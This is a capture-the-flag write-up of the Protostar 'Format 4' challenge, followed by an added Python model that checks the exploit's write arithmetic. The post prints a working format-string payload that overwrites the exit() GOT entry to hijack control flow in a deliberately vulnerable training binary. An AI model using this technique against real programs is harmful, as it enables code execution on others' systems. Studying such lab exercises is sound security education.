Sunday, December 23, 2012

exploit-exercises Protostar: Format 4

The last format string exploitation challenge of the Protostar wargame is Format 4. The source code of the vulnerable program is provided as follows:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
        printf("code execution redirected! you win\n");
        _exit(1);
}

void vuln()
{
        char buffer[512];
        fgets(buffer, sizeof(buffer), stdin);
        printf(buffer);
        exit(1);
}

int main(int argc, char **argv)
{
        vuln();
}

This time, our task is to redirect the flow of execution of the program to the hello() function. We can use either nm or objdump to find hello()'s location.

user@protostar:/opt/protostar/bin$ nm ./format4 | grep hello
080484b4 T hello
user@protostar:/opt/protostar/bin$ objdump -d ./format4 | grep hello
080484b4 <hello>:

The hello() function is located at 0x080484b4. Overwriting vuln()'s return address on the stack doesn't seem like an option, as the printf() call is followed directly by an exit() call, so vuln() never returns. On the other hand, seeing that vuln() uses the exit() library call from libc while hello() uses _exit(), which goes straight to the exit system call, the suggested method to accomplish this challenge seems pretty obvious by now.

We start by preparing our format string exploit.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA%x.%x.%x.%x'" | ./format4
AAAA200.b7fd8420.bffff624.41414141
user@protostar:/opt/protostar/bin$ python -c "print 'AAAA%4\$x'" | ./format4
AAAA41414141
user@protostar:/opt/protostar/bin$ python -c "print 'AAAA%4\$n'" | ./format4
Segmentation fault (core dumped)

This time, however, we will hijack the Global Offset Table (GOT) and overwrite the reference to the exit() function. We use objdump to output the dynamic relocation entries of the program.

user@protostar:/opt/protostar/bin$ objdump -R ./format4

./format4:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

The reference to the exit() function is at 0x08049724. The exploit will thus replace the address of exit() stored at 0x08049724 with the address of hello() in memory, which is 0x080484b4. Building the exploit for multi-byte overwriting is covered in more detail in the previous write-up. In essence, we will write:

0x00b4  => 0x08049724
0x0484  => 0x08049725
0x0008  => 0x08049727
user@protostar:/opt/protostar/bin$ python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08%168x%4$hn%976x%5$hn%132x%6$hn"' | ./format4
$�%�'�
<snip-large-space>
code execution redirected! you win

And that is it. This is the end of the format string exploitation challenges.
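
To check the arithmetic of the format string above, this added example (not code from the original post) models the character count printf() keeps and the three %hn stores, using only the addresses shown in the post; the names trace and read_u32 are hypothetical helpers. It also shows that the third store is a full 16-bit write, so the byte just past the exit() slot, at 0x08049728, is overwritten as well. It assumes each %x value needs no more digits than its field width.

```python
import re
import struct

# Format string exactly as piped into ./format4 in the post.
PAYLOAD = (b"\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08"
           b"%168x%4$hn%976x%5$hn%132x%6$hn")
FIRST_ARG = 4           # the post shows %4$x reading back the start of the buffer
GOT_EXIT = 0x08049724   # exit() slot from the objdump -R output
HELLO = 0x080484b4      # hello() from nm

# Only the two directives this string uses. The 0x25 ('%') byte inside the
# second address is not followed by either form; the post's output shows it
# echoed, so it is counted as a literal byte.
DIRECTIVE = re.compile(rb"%(?:(\d+)\$hn|(\d+)x)")

def trace(payload, first_arg=FIRST_ARG):
    """Model printf(): return (memory, writes) for the %hn stores."""
    memory, writes = {}, []
    printed = pos = 0
    for m in DIRECTIVE.finditer(payload):
        printed += m.start() - pos        # literal bytes are echoed as-is
        pos = m.end()
        if m.group(2):
            # %<width>x: assumed to print exactly <width> characters
            # (true here, a 32-bit value has at most 8 hex digits).
            printed += int(m.group(2))
        else:
            # %N$hn stores the low 16 bits of the running count, little-endian,
            # at the address held in argument N (here: a word of the buffer).
            offset = 4 * (int(m.group(1)) - first_arg)
            (addr,) = struct.unpack_from("<I", payload, offset)
            value = printed & 0xFFFF
            memory[addr], memory[addr + 1] = value & 0xFF, value >> 8
            writes.append((addr, value))
    return memory, writes

def read_u32(memory, addr):
    """Little-endian 32-bit read; bytes never written read as 0."""
    return sum(memory.get(addr + i, 0) << (8 * i) for i in range(4))

if __name__ == "__main__":
    memory, writes = trace(PAYLOAD)
    for addr, value in writes:
        print(f"0x{value:04x} -> 0x{addr:08x}")
    print(f"exit slot now 0x{read_u32(memory, GOT_EXIT):08x}")
    print(f"byte at 0x{GOT_EXIT + 4:08x} overwritten with 0x{memory[GOT_EXIT + 4]:02x}")
```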
